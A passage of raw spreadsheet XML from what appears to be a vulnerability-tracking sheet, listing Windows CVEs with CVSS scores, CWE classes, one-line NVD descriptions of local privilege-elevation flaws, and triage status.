t="n"><v>7.8</v></c><c r="E866" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F866" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G866" s="5" t="inlineStr" /><c r="H866" s="5" t="n"><v>0.003</v></c><c r="I866" s="5" t="inlineStr" /><c r="J866" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K86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66" s="5" t="inlineStr" /><c r="M866" s="5" t="inlineStr" /><c r="N866" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O866" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P866" s="5" t="inlineStr" /><c r="Q866" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="R866" s="5" t="inlineStr"><is><t>Heap-based buffer overflow in Windows Biometric Service allows an authorized attacker to elevate privileges locally.</t></is></c><c r="S866" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69489</t></is></c></row><row r="867"><c r="A867" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B867" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C867" s="5" t="inlineStr"><is><t>CVE-2026-69508</t></is></c><c r="D867" s="5" t="n"><v>7.8</v></c><c r="E867" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F867" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G867" s="5" t="inlineStr" /><c r="H867" s="5" t="n"><v>0.003</v></c><c r="I867" s="5" t="inlineStr" /><c r="J867" s="5" t="inlineStr" /><c r="K867" s="5" t="inlineStr" /><c r="L867" s="5" t="inlineStr" /><c r="M867" s="5" t="inlineStr" /><c r="N867" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O867" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P867" s="5" t="inlineStr" /><c r="Q867" s="5" t="inlineStr"><is><t>CWE-121</t></is></c><c r="R867" s="5" t="inlineStr"><is><t>Stack-based buffer overflow in Windows MIDI Service Module allows an authorized attacker to elevate privileges locally.</t></is></c><c r="S867" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69508</t></is></c></row><row r="868"><c r="A868" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B868" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C868" s="5" t="inlineStr"><is><t>CVE-2026-69509</t></is></c><c r="D868" s="5" t="n"><v>7.8</v></c><c r="E868" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F868" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G868" s="5" t="inlineStr" /><c r="H868" s="5" t="n"><v>0.003</v></c><c r="I868" s="5" t="inlineStr" /><c r="J868" s="5" t="inlineStr" /><c r="K868" s="5" t="inlineStr" /><c r="L868" s="5" t="inlineStr" /><c r="M868" s="5" t="inlineStr" /><c r="N868" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O868" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P868" s="5" t="inlineStr" /><c r="Q868" s="5" t="inlineStr"><is><t>CWE-122, CWE-125</t></is></c><c r="R868" s="5" t="inlineStr"><is><t>Heap-based buffer overflow in Windows Fax Service allows an authorized attacker to elevate privileges locally.</t></is></c><c r="S868" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69509</t></is></c></row><row r="869"><c r="A869" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B869" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C869" s="5" t="inlineStr"><is><t>CVE-2026-69513</t></is></c><c r="D869" s="5" t="n"><v>7.8</v></c><c r="E869" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F869" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G869" s="5" t="inlineStr" /><c r="H869" s="5" t="n"><v>0.003</v></c><c r="I869" s="5" t="inlineStr" /><c r="J869" s="5" t="inlineStr" /><c r="K869" s="5" t="inlineStr" /><c r="L869" s="5" t="inlineStr" /><c r="M869" s="5" t="inlineStr" /><c r="N869" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O869" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P869" s="5" t="inlineStr" /><c r="Q869" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="R869" s="5" t="inlineStr"><is><t>Heap-based buffer overflow in Windows Error Reporting allows an authorized attacker to elevate privileges locally.</t></is></c><c r="S869" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69513</t></is></c></row><row r="870"><c r="A870" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B870" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C870" s="5" t="inlineStr"><is><t>CVE-2026-69528</t></is></c><c r="D870" s="5" t="n"><v>7.8</v></c><c r="E870" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F870" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G870" s="5" t="inlineStr" /><c r="H870" s="5" t="n"><v>0.003</v></c><c r="I870" s="5" t="inlineStr" /><c r="J870" s="5" t="inlineStr" /><c r="K870" s="5" t="inlineStr" /><c r="L870" s="5" t="inlineStr" /><c r="M870" s="5" t="inlineStr" /><c r="N870" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O870" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P870" s="5" t="inlineStr" /><c r="Q870" s="5" t="inlineStr"><is><t>CWE-306</t></is></c><c r="R870" s="5" t="inlineStr"><is><t>Missing authentication for critical function in Windows Shell allows an authorized attacker to elevate privileges locally.</t></is></c><c r="S870" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69528</t></is></c></row><row r="871"><c r="A871" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B871" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C871" s="5" t="inlineStr"><is><t>CVE-2026-69532</t></is></c><c r="D871" s="5" t="n"><v>7.8</v></c><c r="E871" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F871" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G871" s="5" t="inlineStr" /><c r="H871" s="5" t="n"><v>0.003</v></c><c r="I871" s="5" t="inlineStr" /><c r="J871" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K87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71" s="5" t="inlineStr" /><c r="M871" s="5" t="inlineStr" /><c r="N871" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O871" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P871" s="5" t="inlineStr" /><c r="Q871" s="5" t="inlineStr"><is><t>CWE-125</t></is></c><c r="R871" s="5" t="inlineStr"><is><t>Out-of-bounds read in Windows NTFS allows an authorized attacker to elevate privileges locally.</t></is></c><c r="S871" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69532</t></is></c></row><row r="872"><c r="A872" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B872" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C872" s="5" t="inlineStr"><is><t>CVE-2026-69534</t></is></c><c r="D872" s="5" t="n"><v>7.8</v></c><c r="E872" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F872" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G872" s="5" t="inlineStr" /><c r="H872" s="5" t="n"><v>0.006</v></c><c r="I872" s="5" t="inlineStr" /><c r="J872" s="5" t="inlineStr" /><c r="K872" s="5" t="inlineStr" /><c r="L872" s="5" t="inlineStr" /><c r="M872" s="5" t="inlineStr" /><c r="N872" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O872" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P872" s="5" t="inlineStr" /><c r="Q872" s="5" t="inlineStr"><is><t>CWE-77</t></is></c><c r="R872" s="5" t="inlineStr"><is><t>Improper neutralization of special elements used in a command ('command injection') in Windows Program Compatibility Assistant Service allows an authorized attacker to elevate privileges locally.</t></is></c><c r="S872" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69534</t></is></c></row><row r="873"><c r="A873" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B873" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C873" s="5" t="inlineStr"><is><t>CVE-2026-69535</t></is></c><c r="D873" s="5" t="n"><v>7.8</v></c><c r="E873" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F873" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G873" s="5" t="inlineStr" /><c r="H873" s="5" t="n"><v>0.002</v></c><c r="I873" s="5" t="inlineStr" /><c r="J873" s="5" t="inlineStr" /><c r="K873" s="5" t="inlineStr" /><c r="L873" s="5" t="inlineStr" /><c r="M873" s="5" t="inlineStr" /><c r="N873" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O873" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P873" s="5" t="inlineStr" /><c r="Q873" s="5" t="inlineStr"><is><t>CWE-122, CWE-197</t></is></c><c r="R873" s="5" t="inlineStr"><is><t>Numeric truncation error in Windows Spaceport.sys allows an authorized attacker to elevate privileges locally.</t></is></c><c r="S873" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69535</t></is></c></row><row r="874"><c r="A874" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B874" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C874" s="5" t="inlineStr"><is><t>CVE-2026-69538</t></is></c><c r="D874" s="5" t="n"><v>7.8</v></c><c r="E874" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F874" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G874" s="5" t="inlineStr" /><c r="H874" s="5" t="n"><v>0.002</v></c><c r="I874" s="5" t="inlineStr" /><c r="J874" s="5" t="inlineStr" /><c r="K874" s="5" t="inlineStr" /><c r="L874" s="5" t="inlineStr" /><c r="M874" s="5" t="inlineStr" /><c r="N874" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O874" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P874" s="5" t="inlineStr" /><c r="Q874" s="5" t="inlineStr"><is><t>CWE-125</t></is></c><c r="R874" s="5" t="inlineStr"><is><t>Out-of-bounds read in Windows Spaceport.sys allows an authorized attacker to execute code locally.</t></is></c><c r="S874" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69538</t></is></c></row><row r="875"><c r="A875" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B875" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C875" s="5" t="inlineStr"><is><t>CVE-2026-69541</t></is></c><c r="D875" s="5" t="n"><v>7.8</v></c><c r="E875" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F875" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G875" s="5" t="inlineStr" /><c r="H875" s="5" t="n"><v>0.003</v></c><c r="I875" s="5" t="inlineStr" /><c r="J875" s="5" t="inlineStr" /><c r="K875" s="5" t="inlineStr" /><c r="L875" s="5" t="inlineStr" /><c r="M875" s="5" t="inlineStr" /><c r="N875" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O875" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P875" s="5" t="inlineStr" /><c r="Q875" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="R875" s="5" t="inlineStr"><is><t>Heap-based buffer overflow in Virtual Hard Disk (VHD) Miniport Driver allows an authorized attacker to elevate privileges locally.</t></is></c><c r="S875" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69541</t></is></c></row><row r="876"><c r="A876" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B876" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C876" s="5" t="inlineStr"><is><t>CVE-2026-69542</t></is></c><c r="D876" s="5" t="n"><v>7.8</v></c><c r="E876" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F876" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G876" s="5" t="inlineStr" /><c r="H876" s="5" t="n"><v>0.002</v></c><c r="I876" s="5" t="inlineStr" /><c r="J876" s="5" t="inlineStr" /><c r="K876" s="5" t="inlineStr" /><c r="L876" s="5" t="inlineStr" /><c r="M876" s="5" t="inlineStr" /><c r="N876" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O876" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P876" s="5" t="inlineStr" /><c r="Q876" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="R876" s="5" t="inlineStr"><is><t>Heap-based buffer overflow in Windows Camera Frame Server Monitor allows an authorized attacker to elevate privileges locally.</t></is></c><c r="S876" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69542</t></is></c></row><row r="877"><c r="A877" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B877" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C877" s="5" t="inlineStr"><is><t>CVE-2026-69544</t></is></c><c r="D877" s="5" t="n"><v>7.8</v></c><c r="E877" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F877" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G877" s="5" t="inlineStr" /><c r="H877" s="5" t="n"><v>0.003</v></c><c r="I877" s="5" t="inlineStr" /><c r="J877" s="5" t="inlineStr" /><c r="K877" s="5" t="inlineStr" /><c r="L877" s="5" t="inlineStr" /><c r="M877" s="5" t="inlineStr" /><c r="N877" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O877" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P877" s="5" t="inlineStr" /><c r="Q877" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="R877" s="5" t="inlineStr"><is><t>Heap-based buffer overflow in Windows SMB Client allows an authorized attacker to elevate privileges locally.</t></is></c><c r="S877" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69544</t></is></c></row><row r="878"><c r="A878" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B878" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C878" s="5" t="inlineStr"><is><t>CVE-2026-69561</t></is></c><c r="D878" s="5" t="n"><v>7.8</v></c><c r="E878" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F878" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G878" s="5" t="inlineStr" /><c r="H878" s="5" t="n"><v>0.003</v></c><c r="I878" s="5" t="inlineStr" /><c r="J878" s="5" t="inlineStr" /><c r="K878" s="5" t="inlineStr" /><c r="L878" s="5" t="inlineStr" /><c r="M878" s="5" t="inlineStr" /><c r="N878" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O878" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P878" s="5" t="inlineStr" /><c r="Q878" s="5" t="inlineStr"><is><t>CWE-125</t></is></c><c r="R878" s="5" t="inlineStr"><is><t>Out-of-bounds read in Windows CD-ROM Driver allows an authorized attacker to elevate privileges locally.</t></is></c><c r="S878" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69561</t></is></c></row><row r="879"><c r="A879" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B879" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C879" s="5" t="inlineStr"><is><t>CVE-2026-69571</t></is></c><c r="D879" s="5" t="n"><v>7.8</v></c><c r="E879" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F879" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G879" s="5" t="inlineStr" /><c r="H879" s="5" t="n"><v>0.003</v></c><c r="I879" s="5" t="inlineStr" /><c r="J879" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K87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79" s="5" t="inlineStr" /><c r="M879" s="5" t="inlineStr" /><c r="N879" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O879" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P879" s="5" t="inlineStr" /><c r="Q879" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="R879" s="5" t="inlineStr"><is><t>Heap-based buffer overflow in Windows USB Audio Class driver (usbaudio.sys) allows an authorized attacker to elevate privileges locally.</t></is></c><c r="S879" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69571</t></is></c></row><row r="880"><c r="A880" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B880" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C880" s="5" t="inlineStr"><is><t>CVE-2026-69576</t></is></c><c r="D880" s="5" t="n"><v>7.8</v></c><c r="E880" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F880" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G880" s="5" t="inlineStr" /><c r="H880" s="5" t="n"><v>0.003</v></c><c r="I880" s="5" t="inlineStr" /><c r="J880" s="5" t="inlineStr" /><c r="K880" s="5" t="inlineStr" /><c r="L880" s="5" t="inlineStr" /><c r="M880" s="5" t="inlineStr" /><c r="N880" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O880" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P880" s="5" t="inlineStr" /><c r="Q880" s="5" t="inlineStr"><is><t>CWE-416</t></is></c><c r="R880" s="5" t="inlineStr"><is><t>Use after free in Graphic Fonts allows an authorized attacker to elevate privileges locally.</t></is></c><c r="S880" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69576</t></is></c></row><row r="881"><c r="A881" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B881" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C881" s="5" t="inlineStr"><is><t>CVE-2026-69580</t></is></c><c r="D881" s="5" t="n"><v>7.8</v></c><c r="E881" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F881" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G881" s="5" t="inlineStr" /><c r="H881" s="5" t="n"><v>0.003</v></c><c r="I881" s="5" t="inlineStr" /><c r="J881" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K88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81" s="5" t="inlineStr" /><c r="M881" s="5" t="inlineStr" /><c r="N881" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O881" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P881" s="5" t="inlineStr" /><c r="Q881" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="R881" s="5" t="inlineStr"><is><t>Heap-based buffer overflow in Windows Biometric Service allows an authorized attacker to elevate privileges locally.</t></is></c><c r="S881" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69580</t></is></c></row><row r="882"><c r="A882" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B882" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C882" s="5" t="inlineStr"><is><t>CVE-2026-69582</t></is></c><c r="D882" s="5" t="n"><v>7.8</v></c><c r="E882" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F882" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G882" s="5" t="inlineStr" /><c r="H882" s="5" t="n"><v>0.003</v></c><c r="I882" s="5" t="inlineStr" /><c r="J882" s="5" t="inlineStr" /><c r="K882" s="5" t="inlineStr" /><c r="L882" s="5" t="inlineStr" /><c r="M882" s="5" t="inlineStr" /><c r="N882" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O882" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P882" s="5" t="inlineStr" /><c r="Q882" s="5" t="inlineStr"><is><t>CWE-126</t></is></c><c r="R882" s="5" t="inlineStr"><is><t>Buffer over-read in Windows Volume Manager Extension Driver allows an authorized attacker to elevate privileges locally.</t></is></c><c r="S882" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69582</t></is></c></row><row r="883"><c r="A883" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B883" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C883" s="5" t="inlineStr"><is><t>CVE-2026-69583</t></is></c><c r="D883" s="5" t="n"><v>7.8</v></c><c r="E883" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F883" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G883" s="5" t="inlineStr" /><c r="H883" s="5" t="n"><v>0.003</v></c><c r="I883" s="5" t="inlineStr" /><c r="J883" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K88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83" s="5" t="inlineStr" /><c r="M883" s="5" t="inlineStr" /><c r="N883" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O883" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P883" s="5" t="inlineStr" /><c r="Q883" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="R883" s="5" t="inlineStr"><is><t>Heap-based buffer overflow in Windows Biometric Service allows an authorized attacker to elevate privileges locally.</t></is></c><c r="S883" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69583</t></is></c></row><row r="884"><c r="A884" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B884" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C884" s="5" t="inlineStr"><is><t>CVE-2026-69584</t></is></c><c r="D884" s="5" t="n"><v>7.8</v></c><c r="E884" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F884" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G884" s="5" t="inlineStr" /><c r="H884" s="5" t="n"><v>0.003</v></c><c r="I884" s="5" t="inlineStr" /><c r="J884" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K88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84" s="5" t="inlineStr" /><c r="M884" s="5" t="inlineStr" /><c r="N884" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O884" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P884" s="5" t="inlineStr" /><c r="Q884" s="5" t="inlineStr"><is><t>CWE-190</t></is></c><c r="R884" s="5" t="inlineStr"><is><t>Integer overflow or wraparound in Windows USB Video Driver allows an authorized attacker to elevate privileges locally.</t></is></c><c r="S884" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69584</t></is></c></row><row r="885"><c r="A885" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B885" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C885" s="5" t="inlineStr"><is><t>CVE-2026-69585</t></is></c><c r="D885" s="5" t="n"><v>7.8</v></c><c r="E885" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F885" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G885" s="5" t="inlineStr" /><c r="H885" s="5" t="n"><v>0.004</v></c><c r="I885" s="5" t="inlineStr" /><c r="J885" s="5" t="inlineStr" /><c r="K885" s="5" t="inlineStr" /><c r="L885" s="5" t="inlineStr" /><c r="M885" s="5" t="inlineStr" /><c r="N885" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O885" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P885" s="5" t="inlineStr" /><c r="Q885" s="5" t="inlineStr"><is><t>CWE-704</t></is></c><c r="R885" s="5" t="inlineStr"><is><t>Incorrect type conversion or cast in Microsoft Windows Search Component allows an authorized attacker to elevate privileges locally.</t></is></c><c r="S885" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69585</t></is></c></row><row r="886"><c r="A886" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B886" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C886" s="5" t="inlineStr"><is><t>CVE-2026-69589</t></is></c><c r="D886" s="5" t="n"><v>7.8</v></c><c r="E886" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F886" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G886" s="5" t="inlineStr" /><c r="H886" s="5" t="n"><v>0.003</v></c><c r="I886" s="5" t="inlineStr" /><c r="J886" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K88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86" s="5" t="inlineStr" /><c r="M886" s="5" t="inlineStr" /><c r="N886" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O886" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P886" s="5" t="inlineStr" /><c r="Q886" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="R886" s="5" t="inlineStr"><is><t>Heap-based buffer overflow in Windows Biometric Service allows an authorized attacker to elevate privileges locally.</t></is></c><c r="S886" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69589</t></is></c></row><row r="887"><c r="A887" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B887" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C887" s="5" t="inlineStr"><is><t>CVE-2026-69592</t></is></c><c r="D887" s="5" t="n"><v>7.8</v></c><c r="E887" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F887" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G887" s="5" t="inlineStr" /><c r="H887" s="5" t="n"><v>0.003</v></c><c r="I887" s="5" t="inlineStr" /><c r="J887" s="5" t="inlineStr" /><c r="K887" s="5" t="inlineStr" /><c r="L887" s="5" t="inlineStr" /><c r="M887" s="5" t="inlineStr" /><c r="N887" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O887" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P887" s="5" t="inlineStr" /><c r="Q887" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="R887" s="5" t="inlineStr"><is><t>Heap-based buffer overflow in Windows Universal Disk Format File System Driver (UDFS) allows an authorized attacker to elevate privileges locally.</t></is></c><c r="S887" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69592</t></is></c></row><row r="888"><c r="A888" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B888" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C888" s="5" t="inlineStr"><is><t>CVE-2026-69593</t></is></c><c r="D888" s="5" t="n"><v>7.8</v></c><c r="E888" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F888" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G888" s="5" t="inlineStr" /><c r="H888" s="5" t="n"><v>0.003</v></c><c r="I888" s="5" t="inlineStr" /><c r="J888" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K88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888" s="5" t="inlineStr" /><c r="M888" s="5" t="inlineStr" /><c r="N888" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O888" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P888" s="5" t="inlineStr" /><c r="Q888" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="R888" s="5" t="inlineStr"><is><t>Heap-based buffer overflow in Windows Biometric Service allows an authorized attacker to elevate privileges locally.</t></is></c><c r="S888" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69593</t></is></c></row><row r="889"><c r="A889" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B889" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C889" s="5" t="inlineStr"><is><t>CVE-2026-69594</t></is></c><c r="D889" s="5" t="n"><v>7.8</v></c><c r="E889" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F889" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G889" s="5" t="inlineStr" /><c r="H889" s="5" t="n"><v>0.003</v></c><c r="I889" s="5" t="inlineStr" /><c r="J889" s="5" t="inlineStr" /><c r="K889" s="5" t="inlineStr" /><c r="L889" s="5" t="inlineStr" /><c r="M889" s="5" t="inlineStr" /><c r="N889" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O889" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P889" s="5" t="inlineStr" /><c r="Q889" s="5" t="inlineStr"><is><t>CWE-122, CWE-190</t></is></c><c r="R889" s="5" t="inlineStr"><is><t>Heap-based buffer overflow in Microsoft Local Security Authority Server (lsasrv) allows an authorized attacker to elevate privileges locally.</t></is></c><c r="S889" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69594</t></is></c></row><row r="890"><c r="A890" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B890" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C890" s="5" t="inlineStr"><is><t>CVE-2026-69604</t></is></c><c r="D890" s="5" t="n"><v>7.8</v></c><c r="E890" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F890" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G890" s="5" t="inlineStr" /><c r="H890" s="5" t="n"><v>0.003</v></c><c r="I890" s="5" t="inlineStr" /><c r="J890" s="5" t="inlineStr" /><c r="K890" s="5" t="inlineStr" /><c r="L890" s="5" t="inlineStr" /><c r="M890" s="5" t="inlineStr" /><c r="N890" s="5" 